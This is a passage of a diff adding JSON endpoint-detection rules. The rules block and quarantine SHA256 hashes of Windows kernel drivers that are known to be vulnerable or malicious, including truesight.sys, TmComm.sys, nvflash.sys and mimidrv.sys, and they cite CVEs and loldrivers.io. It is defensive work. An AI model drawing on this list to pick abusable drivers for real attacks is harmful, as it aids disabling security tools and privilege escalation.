+ "value": "7b745f6fe075341d69120cb3f54e214d77160c0b344427356487b46a23bf756c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b1f44c28-9df3-5df7-b26b-67c0ee3bb43d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973688Z",
+ "creation_date": "2026-03-23T11:45:29.973690Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973695Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "61befeef14783eb0fed679fca179d2f5c33eb2dcbd40980669ca2ebeb3bf11cf",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b207f879-cc4c-559f-bda8-90faf46eb9ad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146813Z",
+ "creation_date": "2026-03-23T11:45:31.146815Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146820Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "70c13945095582777449d210c2c7ddd5b95496c0456332c933ad79b5549b0eb1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b20f89a6-74f6-58df-bca5-8e5d0cf1781f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461640Z",
+ "creation_date": "2026-03-23T11:45:30.461643Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461652Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7433f14b40c674c5e87b6210c330d5bcaf2f6f52d632ae29e9b7cf3ca405665b",
+ "comment": "Malicious Kernel Driver (aka mlgbbiicaihflrnh.sys) [https://www.loldrivers.io/drivers/b074dcb5-b278-4434-bdd9-14a055d724f3/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b215d0d9-7b14-5bc7-9cfe-0c6ed7984ab8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817736Z",
+ "creation_date": "2026-03-23T11:45:31.817739Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817747Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "87c3de1b890663f6f8b41cae967520501a9f3fca34a7d2c8014aec819e7bffba",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b218ae30-b391-5b2d-9de3-939a276831e5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618966Z",
+ "creation_date": "2026-03-23T11:45:29.618968Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618973Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "11e3d9aa67ef620a452458f67e101aa513c7fbcca8f35e2e5d0e3403d9dee937",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b219d6ac-1366-54f2-a234-66bf9bb28e49",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.471804Z",
+ "creation_date": "2026-03-23T11:45:31.471808Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.471817Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9c837d13c26b679c5fcbcdc2b40c3179310c81aa671bf1eafd3d800b3f0323f0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b22425ae-fc86-5a5d-9cad-3b9606a36f11",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474291Z",
+ "creation_date": "2026-03-23T11:45:31.474295Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474305Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8ec06754fb3bb2f8ac49a097eba70483640b5c2cc5a7136837fa66bec9e884ca",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b22da231-d8eb-5198-8ef7-9b6dc403ad11",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829734Z",
+ "creation_date": "2026-03-23T11:45:31.829737Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829745Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "235e378dd2ade7be420c6530d55efe088efc17c42dd936045dc9849785aa6f50",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b2337d25-1a28-5e52-9141-1f6b5d3eb660",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984923Z",
+ "creation_date": "2026-03-23T11:45:29.984925Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984930Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "57e9de67e908186b3cb8180caa2e5c5d7b6bb31969557b8bd5710d79089e8868",
+ "comment": "Dangerous Physmem Kernel Driver (aka BS_Def64.Sys) [https://www.loldrivers.io/drivers/4a80da66-f8f1-4af9-ba56-696cfe6c1e10/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b237b64c-e1c3-5bcd-a19f-d424c4435d34",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618824Z",
+ "creation_date": "2026-03-23T11:45:29.618826Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618831Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6694435663bf283a3d5f20e9c90cf1bc4d3687e381b32e1a004a9d24471eb95b",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b23df79f-d77e-560d-a40e-eb11cddf10a8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473642Z",
+ "creation_date": "2026-03-23T11:45:31.473646Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473656Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1429bbab0bd067235d06f5857f6976e42587863acd17ca022ab15e97ded5b4fd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b263ba80-da2d-5f98-924a-21c9eaf93681",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150391Z",
+ "creation_date": "2026-03-23T11:45:31.150393Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150398Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cae63e4da0609c13fb1cfa859e5afedd5a8722ffbc764bf47eb276471a928050",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b271a294-a4f8-5b4d-b59d-cea2f3752cff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613083Z",
+ "creation_date": "2026-03-23T11:45:29.613085Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613090Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8f23313adb35782adb0ba97fefbfbb8bbc5fc40ae272e07f6d4629a5305a3fa2",
+ "comment": "ASUS vulnerable UEFI Update Driver (aka AsUpIO64.sys and GVCIDrv64.sys) [https://codeinsecurity.wordpress.com/2016/06/12/asus-uefi-update-driver-physical-memory-readwrite/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b27440a5-a394-5ee0-b335-f973eccacb39",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973705Z",
+ "creation_date": "2026-03-23T11:45:29.973707Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973712Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "62f5e13b2edc00128716cb93e6a9eddffea67ce83d2bb426f18f5be08ead89e0",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b2751049-4219-502c-97be-c6bbc81ccb35",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479704Z",
+ "creation_date": "2026-03-23T11:45:30.479706Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479711Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3482f671cb1b6414e43ab2c9bccc94c1fba67ceac6e9831249f18f31ad68880c",
+ "comment": "Vulnerable Kernel Driver (aka amifldrv64.sys) [https://www.loldrivers.io/drivers/a5eb98bf-2133-46e8-848f-a299ea0ddefa/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b27da2ce-4743-51c9-95b2-c5335c5fc040",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467765Z",
+ "creation_date": "2026-03-23T11:45:30.467768Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467777Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "16b6a65d569ad3d0a1ff5aaf2374c28cebab4a289ffee42b79f7a48d5979b579",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b2891fc8-0b2d-56e1-b347-db736451c2c4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476339Z",
+ "creation_date": "2026-03-23T11:45:31.476343Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476353Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b9c26b3727af0f6ef4ac8cc8648cb4ecc4ad77b02cb0677fcc493b18ca19cdd2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b293d4b8-7b1e-507a-92cf-4143d31fdd16",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830368Z",
+ "creation_date": "2026-03-23T11:45:30.830370Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830375Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8abad96bc2cc4b6388c521671d3c68eed9f88b1e35256f9976974e34a5fe99c5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b29dba2f-df34-50f1-8499-e65d9cc8411b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145642Z",
+ "creation_date": "2026-03-23T11:45:31.145644Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145649Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f7c7bd6b1dee634d5fb234bab0cfe341ff9f2845cddbe59a653366966f603e07",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b2a2c2d4-db7b-5b92-b9ac-3ad17d783db2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488500Z",
+ "creation_date": "2026-03-23T11:45:31.488502Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488507Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "40a0c1cd71d8b3b4eb83fd39125cc93fd4f11ad82a83c5eabc69b4c38c998504",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b2a6d2e4-ddd3-5d5c-bc5e-6f99e8535d90",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824163Z",
+ "creation_date": "2026-03-23T11:45:31.824166Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824174Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "37e5d3bd6a3aeade27febcd905646de65594601ca3650b2b9d79653f4fde73c5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b2a99482-42d5-5f3b-95a6-95fd0b9921b5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826612Z",
+ "creation_date": "2026-03-23T11:45:31.826614Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826619Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "62400cb2654a27de7b71c9515500836ccedc9708a2c6267129552cc94a9ee31a",
